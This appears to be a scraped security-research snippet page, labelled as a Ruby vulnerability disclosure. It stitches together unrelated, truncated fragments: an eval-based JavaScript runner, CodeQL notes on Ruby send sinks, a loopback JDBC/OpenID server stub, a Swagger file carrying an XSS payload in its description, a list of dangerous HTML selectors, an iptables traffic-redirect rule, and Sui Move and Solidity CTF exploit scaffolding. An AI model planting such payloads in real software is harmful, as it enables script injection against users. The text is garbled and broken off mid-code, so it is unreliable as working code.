原文: https://portswigger.net/research/top-10-web-hacking-techniques-of-2023-nominations-open
分类: 漏洞披露-Ruby
<html> | |
<head> | |
<title>JavaScript Execution</title> | |
<script> | |
function executeCode() { | |
const input = document.getElementById('inputCode').value; | |
const output = document.getElementById('outputResult'); | |
try { | |
const result = eval(input); | |
output.textContent = result; |
// send 需要2 参数可控 | |
// public_send 需要 3 参数可控 | |
// (1) todo 对参数本身的类型检查 | |
// (2) todo 对方法本身的检查 | |
// (3) 对 location的检查, 去除 _spec.rb, _example.rb, 直接删除然后构建 database | |
import codeql.ruby.DataFlow | |
from DataFlow::CallNode call | |
where | |
call.getNumberOfArguments() = 2 and |
import struct | |
import asyncio | |
# Address the JDBC client is expected to request (a loopback listener on
# port 1881; `url` is only the base, the path below is presumably appended
# by code that is not part of this excerpt).
# Final request: http://127.0.0.1:1881/.well-known/openid-configuration
url = "http://127.0.0.1:1881/" | |
# Automated string concatenation.
# "0x" is a placeholder: much of the data came from OCR, and it is used to
# pad the lines that are missing so everything lines up.
# NOTE(review): the concatenation code these two comments describe is not
# in this excerpt.
{ | |
"swagger": "2.0", | |
"info": { | |
"description": "<select><template><img src=x onerror=alert(1)></template></select>", | |
"version": "1.0.6", | |
"title": "Swagger Petstore", | |
"termsOfService": "11", | |
"contact": { | |
"email": "apiteam@swagger.io" | |
}, |
dom.querySelector("script") || | |
dom.querySelector("svg") || | |
dom.querySelector("meta") || | |
dom.querySelector("x") || // todo: x:script | |
dom.querySelector("object[data]") || | |
dom.querySelector("iframe[src]") || | |
dom.querySelector("iframe[srcdoc]") || | |
dom.querySelector("embed[src]") || | |
dom.querySelector("base[href]") || | |
dom.querySelector("form[formaction]") || |
# Transparent redirect in the nat table's OUTPUT chain: TCP traffic generated
# by processes running as uid 2000 and bound for port 80 or 443 on any host
# other than 127.0.0.1 is DNAT'ed to the local listener on 127.0.0.1:8080.
# Only that uid and only those two TCP ports are affected; UDP and other
# ports, and other users, pass through untouched. The "! --destination
# 127.0.0.1" exclusion presumably keeps connections already aimed at loopback
# (e.g. the listener's own) from being re-routed.
iptables --table nat --append OUTPUT \
    --protocol tcp ! --destination 127.0.0.1 \
    --match owner --uid-owner 2000 \
    --match multiport --dports 80,443 \
    --jump DNAT --to-destination 127.0.0.1:8080
// code : https://github.com/movebit/movectf-6 | |
// sui move build --dump-bytecode-as-base64 --path . | |
// sui client publish --path ./ --gas-budget 30000 | |
module c6::exp { | |
use ctf::hero; | |
use ctf::adventure; | |
use sui::tx_context::TxContext; | |
public entry fun start( | |
h: &mut hero::Hero, ctx: &mut TxContext | |
): () { |
// Compiler version constraint: caret range, i.e. >=0.8.7 and <0.9.0, so the
// interface below is compiled with 0.8.x checked-arithmetic semantics.
pragma solidity ^0.8.7; | |
interface Target { | |
function profit() external; | |
function guess(uint guess_secret) external; | |
function transfer(address to, uint amount) external; | |
function payforflag(string memory md5ofteamtoken,string memory b64email)external; | |
function withdraw(uint amount) external; |